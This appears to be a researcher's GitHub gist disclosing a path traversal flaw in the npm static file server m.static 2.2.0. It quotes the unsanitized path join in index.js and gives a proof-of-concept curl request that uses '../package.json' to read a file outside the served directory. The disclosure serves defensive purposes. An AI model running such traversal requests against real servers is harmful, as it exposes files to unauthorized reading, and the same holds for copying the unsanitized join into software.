Skip to content

Instantly share code, notes, and snippets.

@lirantal

lirantal/path-traversal-in-mstatic.md Secret

Created November 22, 2022 21:18
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save lirantal/dcb32c11ce87f5aafd2282b90b4dc998 to your computer and use it in GitHub Desktop.
Save lirantal/dcb32c11ce87f5aafd2282b90b4dc998 to your computer and use it in GitHub Desktop.
Download ZIP
Path traversal vulnerability in m.static@2.2.0
Raw
path-traversal-in-mstatic.md

Path traversal vulnerability in m.static@2.2.0

m.static descibres itself as: m(icro)static is a lightweight static file server for node.js written in es6+.

Observation:

  • Virtually zero downloads, so no considerable impact.
  • It was last published 4 years ago.

Resources:

Background on exploitation

This file server library is vulnerable to Path Traversal attacks due to no input sanitization or other checks and protections employed to the path being requested:

Line 19 of index.js:

    const requestFile = join(options.cwd, req.url)

This vulnerability should probably be classified as a CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').

Proof of Concept exploit

  1. Install the latest version of m.static (npm install --save m.static@2.2.0)
  2. Make sure you have a public/ directory with files in it
  3. Run the server npx m.static --port 3000 --cwd public/
  4. Send a request for files outside the static directory and confirm it is successful to employ a path traversal attack: curl --path-as-is "http://localhost:3000/../package.json and observe the contents of the file returned back in the response
.
├── public
│   └── index.html
|── server.js
└── package.json

Author

Liran Tal

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment